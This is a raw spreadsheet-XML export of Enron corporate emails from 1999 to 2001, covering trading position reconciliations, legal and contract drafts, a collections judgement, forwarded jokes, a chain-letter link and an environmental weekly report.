me know if we are still off.   I have attached a copy of the report _x000D_
containing December 12th basis positions.  _x000D_
_x000D_
Thank you for your help._x000D_
Robin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Kathy Reeves_x000D_
12/11/2000 05:34 PM_x000D_
To: Robin Rodrigue/HOU/ECT@ECT_x000D_
cc: Brian Gillis/CAL/ECT@ECT _x000D_
Subject: Re: Basis Positions  _x000D_
_x000D_
Robin,_x000D_
I have reconciled the positions for Clark and Cowan.  Brian Gillis will do _x000D_
Disturnal, Lambie &amp; McKay_x000D_
_x000D_
_x000D_
_x000D_
I believe that Clark &amp; Cowan's positions were incorrect because of the _x000D_
following:_x000D_
1)  Clark has positions at Sumas and Aeco/Stn2.  This is not reflected in the _x000D_
spreadsheet._x000D_
2)   Our basis positions for the prompt month in our Intramonth books are not _x000D_
being picked up any where.  Because our IM traders actually trade for this _x000D_
month AND the prompt month their physical and gas daily positions should be _x000D_
picked up as basis positions for the prompt month as well as intramonth.  For _x000D_
example, Cowan is long 189 contracts physically Aeco for January.   Our IM _x000D_
traders trade prompt and well as intramonth because of the way our Aeco _x000D_
prices settle (ie:  during the month preceding, not during bidweek)._x000D_
_x000D_
Kathy_x000D_
_x000D_
_x000D_
_x000D_
Robin Rodrigue_x000D_
12/11/2000 07:58 AM_x000D_
To: Brian Gillis/CAL/ECT@ECT, Kathy Reeves/CAL/ECT@ECT_x000D_
cc:  _x000D_
Subject: Basis Positions_x000D_
_x000D_
Brian/Kathy,_x000D_
_x000D_
I have attached a copy of a report that is given to John Lavorato every _x000D_
morning.  This report shows basis positions by trader for specific points.  _x000D_
Please let me know if the positions we are reporting for the Canadian traders _x000D_
are correct.  If you unhide columns C-S you will find the curves that are _x000D_
added in each section.  The curves highlighted in green are used for _x000D_
intramonth positions and the white are the basis curves.   The intra-month _x000D_
position that shows is a combination of  physical and gas daily.  All other _x000D_
time periods are only basis notional.  If you have any questions give me a _x000D_
call.  _x000D_
_x000D_
Thanks,_x000D_
Robin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 04:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fw: Wednesday Laugh</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Sandra F Brawner/HOU/ECT on 04/02/2001 _x000D_
11:37 AM ---------------------------_x000D_
_x000D_
_x000D_
"Jon Schnitzer" &lt;jons@amerexenergy.com&gt; on 03/28/2001 09:27:20 AM_x000D_
To: "susan schnitzer" &lt;s.schnitzer@worldnet.att.net&gt;, "Sandra F Brawner" _x000D_
&lt;Sandra.F.Brawner@enron.com&gt;, "keith taylor" &lt;kata@dynegy.com&gt;, "lance _x000D_
jordan" &lt;lcjo@dynegy.com&gt;, "john shaw" &lt;john.shaw@glencore-us.com&gt;, "jeremy _x000D_
davis" &lt;jjda@dynegy.com&gt;, "david dunnavandt" &lt;ddunnavant@reliantenergy.com&gt;, _x000D_
"anrew o ertel" &lt;aertel@evomarkets.com&gt;_x000D_
cc:  _x000D_
Subject: Fw: Wednesday Laugh_x000D_
_x000D_
_x000D_
_x000D_
----- Original Message -----_x000D_
From: "Gabriela Rehlinger" &lt;grehlinger@altra.com&gt;_x000D_
Sent: Wednesday, March 28, 2001 9:01 AM_x000D_
Subject: FW: Wednesday Laugh_x000D_
_x000D_
_x000D_
&gt; &gt; Fishing Trip_x000D_
&gt; &gt; A young guy from Texas moves to California and goes to a big department_x000D_
&gt; &gt; store looking for a job.  The manager says, "Do you have any sales_x000D_
&gt; &gt; experience?"   &lt;&lt;...OLE_Obj...&gt;&gt;_x000D_
&gt; &gt; The kid says, "Yeah, I was a salesman back home in Texas."_x000D_
&gt; &gt; &lt;&lt;...OLE_Obj...&gt;&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Well, the boss liked the kid, so he gave him the job. "You start_x000D_
tomorrow._x000D_
&gt; &gt; I'll come down after we close and see how you did."   &lt;&lt;...OLE_Obj...&gt;&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; His first day on the job was rough but he got through it. After the_x000D_
store_x000D_
&gt; &gt; was locked up, the boss came down. "How many sales did you make today?"_x000D_
&gt; &gt; &lt;&lt;...OLE_Obj...&gt;&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; The kid says, "One." The boss says, "Just one? Our sales people average_x000D_
20_x000D_
&gt; &gt; or 30 sales a day. How much was the sale for?"   &lt;&lt;...OLE_Obj...&gt;&gt;  Kid_x000D_
&gt; &gt; says, "$101,237.64."  Boss says, "$101,237.64? What did you sell him?"_x000D_
&gt; &gt; &lt;&lt;...OLE_Obj...&gt;&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt; Kid says, "First I sold him a small fish hook. Then I sold him a medium_x000D_
&gt; &gt; fish hook. Then I sold him a larger fish hook. Then I sold him a new_x000D_
&gt; &gt; fishing rod. Then I asked him where he was going fishing, and he said_x000D_
down_x000D_
&gt; &gt; at the coast, so I told him he was gonna need a boat, so we went down to_x000D_
&gt; &gt; the boat department, and I sold him that twin engine Chris Craft. Then_x000D_
he_x000D_
&gt; &gt; said he didn't think his Honda Civic would pull it, so I took him down_x000D_
to_x000D_
&gt; &gt; the automotive department and sold him that 4X4 Blazer."_x000D_
&gt; &gt;_x000D_
&gt; &gt; The boss said, "A guy came in here to buy a fish hook and you sold him a_x000D_
&gt; &gt; boat and truck?"_x000D_
&gt; &gt;_x000D_
&gt; &gt; Kid says, "No, he came in here to buy a box of tampons for his wife, and_x000D_
I_x000D_
&gt; &gt; said, 'Well, since your weekend's shot, you might as well go fishing.'"_x000D_
&gt; &gt; &lt;&lt;...OLE_Obj...&gt;&gt;_x000D_
&gt; &gt;_x000D_
&gt; &gt;_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 13 Jul 2001 06:04:46 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'william.keeney@enron.com'})</t>
  </si>
  <si>
    <t>financial models</t>
  </si>
  <si>
    <t xml:space="preserve">Louise:_x000D_
_x000D_
The base model was too large to send via e-mail, so I placed it into the common directory located at o:\_Dropbox\Dodger.  The file name is CASH_BrooklynNavyYard_070601,v4.  If you need help pulling it out of the dropbox, give me a call and I will walk upstairs to bring it up._x000D_
_x000D_
I also included the model output from Power Commodity Structuring's analysis of the transaction upsides.  Attached is a draft of the DASH (please note RAC has not officially signed off).  Please let me know if you would like to see anything else._x000D_
_x000D_
Thanks-_x000D_
Bill_x000D_
_x000D_
 </t>
  </si>
  <si>
    <t>Sun, 3 Dec 2000 22:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>One of your friends sent this email through our website._x000D_
Friend's name: Angela Barnett_x000D_
Friend's IP address: 192.152.140.9_x000D_
Date and Time: 12/4/00 6:27:29 AM EST_x000D_
See the bottom of this message to report abuse._x000D_
_x000D_
_x000D_
Hi,_x000D_
_x000D_
Angela Barnett would like you to see this Web page:_x000D_
_x000D_
http://www.daily-blessings.com/ch1p.htm_x000D_
_x000D_
an invitation_x000D_
_x000D_
================================================_x000D_
Angela Barnett also included this note:_x000D_
_x000D_
_x000D_
================================================_x000D_
_x000D_
_x000D_
_x000D_
Win a Billion Dollars!_x000D_
Win a Billion Dollars!_x000D_
Win a Billion Dollars!_x000D_
Win a Billion Dollars!_x000D_
_x000D_
go to:_x000D_
http://mailbits.net/grab/taf.asp_x000D_
&lt;a href="http://mailbits.net/grab/taf.asp"&gt;Win a Billion Dollars !!!&lt;/a&gt;_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_____x000D_
***IMPORTANT NOTE***_x000D_
_x000D_
This is a free service provided by MailBits.com._x000D_
Compared to regular email, this is a better way to_x000D_
recommend a website to your friends. That's because_x000D_
information about the sender of the message is included_x000D_
to prevent and catch abuse of the system._x000D_
_x000D_
To report abuse of this service: abuse-taf@mailbits.com</t>
  </si>
  <si>
    <t>Tue, 1 Jun 1999 06:08:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'marie.heard@enron.com', 'shari.stack@enron.com', 'sara.shackleton@enron.com', 'susan.flynn@enron.com', 'carol.clair@enron.com', 'susan.bailey@enron.com', 'brent.hendry@enron.com', 'mark.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Legal/Credit Meeting</t>
  </si>
  <si>
    <t>The Legal/Credit Meeting scheduled for today is canceled due to the absence _x000D_
of Susan Flynn.</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 01:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: FW: Revised form of Memorandum of Option</t>
  </si>
  <si>
    <t>That would be wonderful!  I was looking at those online this weekend.  I used _x000D_
play pens all of the time for my children._x000D_
_x000D_
Thanks very much._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay  _x000D_
Sent: Tuesday, May 29, 2001 8:38 AM_x000D_
To: Carnahan, Kathleen_x000D_
Subject: RE: FW: Revised form of Memorandum of Option_x000D_
_x000D_
I have a pretty cool portable play pen you can have if you want.</t>
  </si>
  <si>
    <t>Mon, 27 Nov 2000 23:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'bhughes@sithe.com', 'joliver@sithe.com', 'bfernandez@sithe.com', 'mgrady@sithe.com', 'lmessina@sithe.com', 'jmaher@sithe.com', 'slee@sithe.com', 'mrosenberg@sithe.com', 'bscherling@sithe.com'})</t>
  </si>
  <si>
    <t>Revised Procedures</t>
  </si>
  <si>
    <t xml:space="preserve">This is the memo that Sam sent back to Enron with a few revisions to my draft _x000D_
procedures.  We are currently_x000D_
 reviewing these changes and will discuss them during our conference call._x000D_
_x000D_
Ruth_x000D_
---------------------- Forwarded by Ruth Concannon/HOU/ECT on 11/28/2000 _x000D_
06:37 AM ---------------------------_x000D_
_x000D_
_x000D_
"Lee, Sam" &lt;slee@Sithe.com&gt; on 09/28/2000 01:12:19 PM_x000D_
To: "'Ruth.Concannon@enron.com'" &lt;Ruth.Concannon@enron.com&gt;, _x000D_
"'mroserberg@sithe.com'" &lt;mroserberg@sithe.com&gt;, "Oliver, Jason" _x000D_
&lt;joliver@Sithe.com&gt;, "Hughes, Bill" &lt;bhughes@Sithe.com&gt;, "Fernandez, Bill" _x000D_
&lt;bfernandez@Sithe.com&gt;, "Messina, Larry" &lt;lmessina@Sithe.com&gt;, "Lee, Sam" _x000D_
&lt;slee@Sithe.com&gt;, "Maher, Janine" &lt;jmaher@Sithe.com&gt;, "Scherfling, Bob" _x000D_
&lt;bscherfling@Sithe.com&gt;, "Grady, Mike" &lt;mgrady@Sithe.com&gt;_x000D_
cc: "'Jeff.Donahue@enron.com'" &lt;Jeff.Donahue@enron.com&gt;, _x000D_
Todd.Busby@enron.com, "Lee, Sam" &lt;slee@Sithe.com&gt; _x000D_
Subject: Revised Procedures_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Please see the revised procedures below: _x000D_
_x000D_
 &lt;&lt;Sithe Empire Deal Procedures2.doc&gt;&gt; _x000D_
_x000D_
 - Sithe Empire Deal Procedures2.doc_x000D_
</t>
  </si>
  <si>
    <t>Wed, 24 Oct 2001 06:29:34 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Oasis Dairy Farms Judgement - update</t>
  </si>
  <si>
    <t>According to Bonnie White, the time period for Oasis to appeal ends on Friday 11/2.  If there is no appeal, then Enron will file a writ of execution with the local sherriff who will go out to the business and seize property in an amount to satisfy the judgement.  This is cheaper than hiring a collection agency and we retain more of the funds.  Let me know if you have questions._x000D_
kh_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Watson, Kimberly  _x000D_
Sent:	Monday, October 22, 2001 10:54 AM_x000D_
To:	Hyatt, Kevin_x000D_
Subject:	FW: Oasis Dairy Farms Judgement_x000D_
_x000D_
Kevin,_x000D_
_x000D_
Who in legal have you been working with?  Tracy was wondering when we thought we would receive the money._x000D_
_x000D_
Thanks, Kim._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Geaccone, Tracy  _x000D_
Sent:	Monday, October 22, 2001 10:34 AM_x000D_
To:	Watson, Kimberly_x000D_
Subject:	RE: Oasis Dairy Farms Judgement_x000D_
_x000D_
Any idea when or if we will receive the money?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Watson, Kimberly  _x000D_
Sent:	Sunday, October 21, 2001 3:33 PM_x000D_
To:	Moore, Jan; Geaccone, Tracy_x000D_
Subject:	FW: Oasis Dairy Farms Judgement_x000D_
_x000D_
FYI, Kim._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hyatt, Kevin  _x000D_
Sent:	Wednesday, October 10, 2001 9:54 AM_x000D_
To:	Moseley, Debbie; Watson, Kimberly; Cherry, Paul_x000D_
Cc:	Gadd, Eric; Harris, Steven_x000D_
Subject:	Oasis Dairy Farms Judgement_x000D_
_x000D_
Earlier this year I requested that the Enron litigation unit file suit against Oasis Dairy for collection of unpaid transport bills on TW.  The suit was filed in the fifth judicial district court in Chaves County, NM.  _x000D_
_x000D_
On October 1, 2001, TW was granted summary judgement in the case by the court in the amount of $29,250.56 inclusive of back interest and attorney fees.  This amount will continue to accrue interest at 8.75% per annum until paid by Oasis.  _x000D_
_x000D_
If you would like a copy of the judgement, please let me know._x000D_
_x000D_
kh</t>
  </si>
  <si>
    <t>Tue, 29 May 2001 05:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kay.mann@enron.com', 'david.fairley@enron.com', 'heather.kroll@enron.com', 'reagan.rorschach@enron.com', 'kayne.coulter@enron.com'})</t>
  </si>
  <si>
    <t>RE: comparison of definitions - 1st in each pair is from letter_x000D_
 agreeement</t>
  </si>
  <si>
    <t>Please include Jeffrey Miller in these discussions and emails.  Kayne is ou=_x000D_
t=20_x000D_
of the office and Jeff is back-up on MDEA._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Tom._x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Mann, Kay =20_x000D_
Sent: Tuesday, May 29, 2001 11:52 AM_x000D_
To: Rorschach, Reagan; Fairley, David; Kroll, Heather; May, Tom; Coulter,=_x000D_
=20_x000D_
Kayne_x000D_
Subject: comparison of definitions - 1st in each pair is from letter=20_x000D_
agreeement_x000D_
_x000D_
1. =01&amp;Ancillary Services=018 or =01&amp;AS=018 means those services required b=_x000D_
y Entergy=01,s=20_x000D_
interconnection agreement with MDEA or Entergy=01,s tariff._x000D_
OR_x000D_
=01&amp;Ancillary Services=018 or =01&amp;AS=018 means those services recognized by=_x000D_
 Entergy=01,s=20_x000D_
interconnect agreement with MDEA or Entergy=01,s tariff._x000D_
2.=01&amp;Available Energy=018 means Energy that is available for sale on any g=_x000D_
iven day=20_x000D_
that is in excess of MDEA=01,s Native Load._x000D_
OR_x000D_
=01&amp;Available Energy=018 means Energy that is available for sale on any giv=_x000D_
en day=20_x000D_
that is in excess of (i) MDEA=01,s Native Load, and (ii) the Energy require=_x000D_
d to=20_x000D_
be sold under any Existing Transactions, up to the total amount of Energy o=_x000D_
n=20_x000D_
any day that can be produced from the Facilities.=20_x000D_
3.=01&amp;Available Energy=018 means Energy that is available for sale on any g=_x000D_
iven day=20_x000D_
that is in excess of MDEA=01,s Native Load._x000D_
OR_x000D_
=01&amp;Available Energy=018 means Energy that is available for sale on any giv=_x000D_
en day=20_x000D_
that is in excess of (i) MDEA=01,s Native Load, and (ii) the Energy require=_x000D_
d to=20_x000D_
be sold under any Existing Transactions, up to the total amount of Energy o=_x000D_
n=20_x000D_
any day that can be produced from the Facilities.=20_x000D_
4.=01&amp;Confirmation=018 means a confirmation of a transaction or transaction=_x000D_
s._x000D_
OR_x000D_
=01&amp;Confirmation=018 means the document provided for under the MPPSA or the=_x000D_
 MGPSA=20_x000D_
and with the corresponding third party under a Back-to-Back Transaction or=_x000D_
=20_x000D_
with EPMI which specifies the Product being bought or sold, the duration of=_x000D_
=20_x000D_
the Transaction and the other terms, including price. A daily report of all=_x000D_
=20_x000D_
hourly (or similarly short term) purchases and sales will be provided to th=_x000D_
e=20_x000D_
Customer and shall serve as a Confirmation for those transactions under the=_x000D_
=20_x000D_
MPPSA or MGPSA._x000D_
5.=01&amp;Delivery Point=018 means the busbar of the respective Facilities loca=_x000D_
ted at=20_x000D_
the interconnection between CPUC=01,s and YCPSC=01,s respective transmissio=_x000D_
n=20_x000D_
systems at the 115 kV switching station at the respective interconnections=_x000D_
=20_x000D_
with the Entergy transmission system._x000D_
Or_x000D_
=01&amp;Delivery Point=018 =01&amp;Point of Delivery=018 or =01&amp;POD=018 means (a) f=_x000D_
or power (i) the=20_x000D_
interfaces  located at the interconnection between Clarksdale and Yazoo Cit=_x000D_
y=20_x000D_
transmission systems at the  Entergy system, or (ii) the point specified in=_x000D_
=20_x000D_
any Back-to-Back Transaction, EPMI Transaction or Structured Transaction at=_x000D_
=20_x000D_
which Products are to be tendered under a Confirmation; (b) for natural gas=_x000D_
,=20_x000D_
(i) for Clarksdale, the point of interconnection between Texas Gas and=20_x000D_
Clarksdale (ii) for Yazoo City, the interconnection between Southern Natura=_x000D_
l=20_x000D_
Gas (Sonat) and Mississippi Valley Gas for the Yazoo City Power Plant (the=_x000D_
=20_x000D_
Sonat Delivery Point) (iii) the interconnection between Mississippi Valley=_x000D_
=20_x000D_
Gas (MVG) and the Yazoo City Power Plant (MVG Delivery Point), (iv) any poi=_x000D_
nt=20_x000D_
where fuel is delivered as specified in a Fuel Transaction._x000D_
6.=01&amp;Incentive Fee=018 means forty percent (40%) of the Savings and of the=_x000D_
 net=20_x000D_
profit from external sales of the Cities=01, natural gas resources and the=_x000D_
=20_x000D_
purchase of on-peak Energy, as calculated in accordance with Article III of=_x000D_
=20_x000D_
this ILA._x000D_
Or_x000D_
=01&amp;Incentive Fee=018 means the fee described in [Section]._x000D_
7.=01&amp;Market Price=018 is the price agreed by the parties to be paid by EPM=_x000D_
I in any=20_x000D_
EPMI Transaction for the sale of Energy to third parties, or the amount to =_x000D_
be=20_x000D_
paid to EPMI for the sale of Energy to the Cities and/or MDEA._x000D_
or_x000D_
=01&amp;Market Price=018 is the price agreed to (i) by any third party for the =_x000D_
sale or=20_x000D_
purchase to or from EPMI or MDEA in a Back-to-Back Transaction, (ii) the=20_x000D_
price paid by EPMI in any EPMI Transaction or (iii) by any third party=20_x000D_
pursuant to any Structured Transaction.=20_x000D_
8. =01&amp;Protocols=018 shall mean the SPP Protocols duly adopted by SPP, incl=_x000D_
uding=20_x000D_
any attachments or exhibits referenced thereby, as amended from time to tim=_x000D_
e,=20_x000D_
containing the scheduling, operating, planning, reliability, and settlement=_x000D_
=20_x000D_
(including customer registration) policies, rules, guidelines, procedures,=_x000D_
=20_x000D_
standards, and criteria of SPP.  For the purposes of determining=20_x000D_
responsibilities and rights at a given time, the Protocols, as amended in=_x000D_
=20_x000D_
accordance with the change procedure(s) described in the Protocols, in effe=_x000D_
ct=20_x000D_
at the time of the performance or non-performance of an action, shall gover=_x000D_
n=20_x000D_
with respect to that action._x000D_
or_x000D_
=01&amp;Protocols=018 shall mean the Protocols duly adopted by SPP, SERC, NERC,=_x000D_
 and/or=20_x000D_
Entergy, including any attachments or exhibits referenced thereby, as amend=_x000D_
ed=20_x000D_
from time to time, containing the scheduling, operating, planning,=20_x000D_
reliability, and settlement (including customer registration) policies,=20_x000D_
rules, guidelines, procedures, standards, and operations criteria.  For the=_x000D_
=20_x000D_
purposes of determining responsibilities and rights at a given time, the=20_x000D_
Protocols, as amended in accordance with the change procedure(s) described =_x000D_
in=20_x000D_
the Protocols, in effect at the time of the performance or non-performance =_x000D_
of=20_x000D_
an action, shall govern with respect to that action. =20_x000D_
9.=01&amp;Savings=018 shall mean the difference between 1) the total costs to M=_x000D_
DEA=20_x000D_
and/or the Cities of a Transaction, and 2) the total costs of MDEA and/or t=_x000D_
he=20_x000D_
Cities avoided or displaced by the Transaction, which difference shall be=_x000D_
=20_x000D_
calculated as described in Article III of this ILA._x000D_
not defined in rev 23 definitions</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 00:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'johnstaikos@paulhastings.com'})</t>
  </si>
  <si>
    <t>Re: GE Guarantee</t>
  </si>
  <si>
    <t xml:space="preserve">Didn't go through the first time._x000D_
_x000D_
Kay_x000D_
---------------------- Forwarded by Kay Mann/Corp/Enron on 04/26/2001 07:19 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
Kay Mann_x000D_
04/26/2001 07:17 AM_x000D_
To: "Staikos, John P." &lt;johnstaikos@paulhastings.com&gt;_x000D_
cc: CCampbell@KSLAW.com/, gregorylang@paulhastings.com/, _x000D_
johnstaikos@paulhastings.com/, "'VAN DUSEN, Nicholas'" _x000D_
&lt;nicholas.vandusen@freshfields.com/, "'O'BRIEN, Lisa'" &lt;lisa.obri&gt; _x000D_
_x000D_
Subject: Re: GE Guarantee  _x000D_
_x000D_
Will you  be providing an execution version with questions removed/blanks _x000D_
filled in?  Please send it directly to kent.shoemaker@ae.ge.com, copy to me._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
"Staikos, John P." &lt;johnstaikos@paulhastings.com&gt; on 04/25/2001 11:42:49 AM_x000D_
To: "'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;, "'Campbell, Carolyn'" _x000D_
&lt;CCampbell@KSLAW.com&gt;_x000D_
cc: "Lang, Gregory F." &lt;gregorylang@paulhastings.com&gt;, "Staikos, John P." _x000D_
&lt;johnstaikos@paulhastings.com&gt;, "'VAN DUSEN, Nicholas'" _x000D_
&lt;nicholas.vandusen@freshfields.com&gt;, "'O'BRIEN, Lisa'" _x000D_
&lt;lisa.obrien@freshfields.com&gt;, "'PARKER, Isabel'" _x000D_
&lt;isabel.parker@freshfields.com&gt; _x000D_
_x000D_
Subject: GE Guarantee_x000D_
_x000D_
_x000D_
_x000D_
"paulhastings.com" made the following annotations on 04/25/01 12:42:55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Attached please find the GE Guarantee in  Word format.? Also, we have _x000D_
attached a pdf black-line of the Guarantee vs  the form of guarantee in the _x000D_
Turbine Contract._x000D_
?_x000D_
Do not hesitate to call us with any  questions._x000D_
?_x000D_
Best regards._x000D_
?_x000D_
_______________________x000D_
John  Staikos_x000D_
Direct Dial:?  203.961.7523_x000D_
Direct Fax:?  203.674.7723_x000D_
E-mail:?  johnstaikos@paulhastings.com_x000D_
?_x000D_
 - 47K202!.DOC_x000D_
 - GE Guarantee black-line against form of guarantee - distrbuted 4-25-01.pdf_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 15 Jun 2001 05:56:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'laura.glenn@enron.com'})</t>
  </si>
  <si>
    <t>EHS Weekly Report - Week ending 6/15/01</t>
  </si>
  <si>
    <t xml:space="preserve">GENERAL_x000D_
_x000D_
FCBC - Mike Terraso attended the donors meeting of the Foundation of=20_x000D_
Conservation for the Chiquitano Forest in Miami.  The FCBC executive direct=_x000D_
or=20_x000D_
reviewed the considerable progress in gaining confidence of many of the=20_x000D_
indigenous groups, the Bolivain Ministry of Natural Resources and other=20_x000D_
government agencies._x000D_
=20_x000D_
Greenpeace - Mike Terraso was contacted by a Greenpeace International=20_x000D_
representative in an attempt to clarify Enron's position regarding the Kyot=_x000D_
o=20_x000D_
protocal. Mike pointed out that Enron was no longer a member of the US=20_x000D_
Council for International Business, which was the focus of the Greenpeace=_x000D_
=20_x000D_
reposnse to Enron's position.  The conversation was cordial and Mike=20_x000D_
explained Enron's position supporting a multilateral emissions reduction=20_x000D_
agreement requiring some participation by developing nations._x000D_
_x000D_
EUROPE_x000D_
_x000D_
ENS Poland - Alan Stringer supported management on potential warranty claim=_x000D_
s=20_x000D_
and provide assistance on gap analysis between Enron Guidelines and ENS EHS=_x000D_
=20_x000D_
policies._x000D_
_x000D_
UK, Project McCook  - Alan Stringer working with UK EEOS team to provide=20_x000D_
environmental advice for potential =01&amp;tolling=018 agreement.  Provided up-=_x000D_
date to=20_x000D_
Susan._x000D_
_x000D_
ENRON GLOBAL ASSETS_x000D_
(Central America, South America, India and Asia)_x000D_
_x000D_
Jamaica, IGL, Operations Audit - Ken Lovejoy assisted the IGL staff with th=_x000D_
e=20_x000D_
action items from the operational audit conducted on the Ferry and Spanish=_x000D_
=20_x000D_
Town Road locations. Many of the action items have been addressed with=20_x000D_
procedures and guidelines being put into place that will allow the items to=_x000D_
=20_x000D_
be closed.=20_x000D_
_x000D_
Argentina, TGS Visit - Henry Van and Edgar Zuleta  conducted presentations =_x000D_
on=20_x000D_
Enron EH&amp;S organization and workshop on EH&amp;S management optimization.  Also=_x000D_
=20_x000D_
visited eight  TGS facilities.=20_x000D_
=20_x000D_
Guam, Marianas Energy Company Power Plant (MEC)  - Bal Wong led a desktop=_x000D_
=20_x000D_
exercise regarding personnel injury, heavy rain and flooding, and earthquak=_x000D_
e=20_x000D_
emergency response procedures with Operations Department Groups A and D.  T=_x000D_
he=20_x000D_
exercise resulted into four major recommendations that would improve the=20_x000D_
existing plan._x000D_
_x000D_
ENRON INDUSTRIAL MARKETS_x000D_
_x000D_
ARKANSAS, HUNTCO Steel - Following closing on the Huntco deal on June 8,=20_x000D_
2001, Gus Eghneim is working with the transition team to ensure proper=20_x000D_
transfer of permits to Enron._x000D_
_x000D_
ENRON ENERGY SERVICES_x000D_
_x000D_
EES - Distributed Power Generation =01) Gus Eghneim is working with the New=_x000D_
=20_x000D_
Mexico Environment Department currently evaluating the construction permit=_x000D_
=20_x000D_
application for the proposed Gallup Compressor station power facility. An=_x000D_
=20_x000D_
administrative completeness letter is anticipated by end of this week._x000D_
_x000D_
EES - New Business Venture - Gus Eghneim is providing environmental strateg=_x000D_
y=20_x000D_
support for an EES business deals in Las Vegas New York,Dallas, Boston and=_x000D_
=20_x000D_
Kansas City.=20_x000D_
_x000D_
REGULATORY TECHNICAL ANALYSIS_x000D_
_x000D_
INGAA EH&amp;S Meeting - Marc Phillips attended an INGAA EH&amp;S meeting and=20_x000D_
provided an update to the group on the New Source Review Work Group=20_x000D_
activities.=20_x000D_
_x000D_
TXOGA Legislative Meeting - Marc Phillips attended a TXOGA legislative=20_x000D_
meeting and provided an update to the group on the activities of the TXOGA=_x000D_
=20_x000D_
Pipeline Committee._x000D_
_x000D_
Hazardous Waste Identification Rulemaking - Jim Peterson is reviewing the=_x000D_
=20_x000D_
revisions to the Hazardous Waste Identification Rule for implications for=_x000D_
=20_x000D_
Enron._x000D_
_x000D_
Recordkeeping Final Rule Negotiations - Russell Tucker working within the N=_x000D_
AM=20_x000D_
task force has completed the talking points document for entering into the=_x000D_
=20_x000D_
first negotiation meeting with OSHA on 6/15/01.=20_x000D_
_x000D_
COMPETITIVE INTELLIGENCE &amp; BUSINESS OPPORTUNITIES_x000D_
_x000D_
East Power Desk - Stacey Bolton met with a new trader on the East Power Des=_x000D_
k=20_x000D_
and offered to  provide competitive intelligence on environmental issues th=_x000D_
at=20_x000D_
could affect the power curves._x000D_
_x000D_
GHG - Lisa Jacobson solicited comments from commercial groups on voluntary=_x000D_
=20_x000D_
emission trading initiatives including the Chicago Climate Exchange, a=20_x000D_
voluntary CO2 international trading pilot program with several Mid-Western=_x000D_
=20_x000D_
states and Brazil._x000D_
_x000D_
NOx Trading -  Lisa analyzed NOx emissions trading initiatives in Canada fo=_x000D_
r=20_x000D_
Enron Government Affairs,_x000D_
_x000D_
Renewable Desk - Stacey Bolton is working with Elliot Mainzer on an=20_x000D_
opportunity to expand the City of Chicago deal, and provided Elliot with EE=_x000D_
S=20_x000D_
lead originator contact as well as the wholesale procurer for ComEd.  ComEd=_x000D_
=20_x000D_
has a large renewable delivery obligation in their contract with the city o=_x000D_
f=20_x000D_
Chicago._x000D_
_x000D_
ADVOCACY &amp; COMMERCIAL SUPPORT_x000D_
_x000D_
Air Quality - Offsets/ERCs -   Mary Schoen  met with West Developers and CA=_x000D_
=20_x000D_
Gov't Affairs to develop near and longer-term strategies for advocating=20_x000D_
changes to relevant environmental regulations at the state and Federal=20_x000D_
levels.   Mary and Stacey are working with the EES Emission Risk Group to=_x000D_
=20_x000D_
create/apply for NOx offset/set-asides from EES' energy efficiency project._x000D_
_x000D_
Global Climate Change - Lisa Jacobson reported to several corporate and=20_x000D_
commercial groups( EES, EWS, EGM, Enron Wind and Enron Europe) on the Bush=_x000D_
=20_x000D_
Administration's evolving climate change proposal, continuing to keep=20_x000D_
corporate and commercial groups updated on political and policy issues=20_x000D_
related to emissions trading and the Kyoto Protocol. =20_x000D_
_x000D_
ACQUISITIONS_x000D_
_x000D_
McCook Tolling Agreement -  Don Stevens and Susan Worthen received a copy o=_x000D_
f=20_x000D_
an Enron Metals Europe draft tolling agreement and property lease.  An=20_x000D_
overall project description/strategy has not been provided.  Our preliminar=_x000D_
y=20_x000D_
understanding of the agreement is that Enron is pursueing a contract to=20_x000D_
supply alumina to 2 -3 smelters located in Washington State and the Chicago=_x000D_
=20_x000D_
area with market access to self-generated power.  The deal would likely be=_x000D_
=20_x000D_
signed with a 60 day period reserved for conducting due diligence post=20_x000D_
closing and subject to agreement of environmental indemnification.  The=20_x000D_
aluminum smelters are currently shut-down. =20_x000D_
_x000D_
York CoGen Facility - 70 MW combined cycle natural gas fired cogeneration=_x000D_
=20_x000D_
facility located in York, Pennsylvania.  Solar Turbines, Inc. (STI), wholly=_x000D_
=20_x000D_
owned by Catepillar, Inc. which is located next door and has shut down=20_x000D_
operations, owns the facility.   Enron would enter into a LLC with Fenton &amp;=_x000D_
=20_x000D_
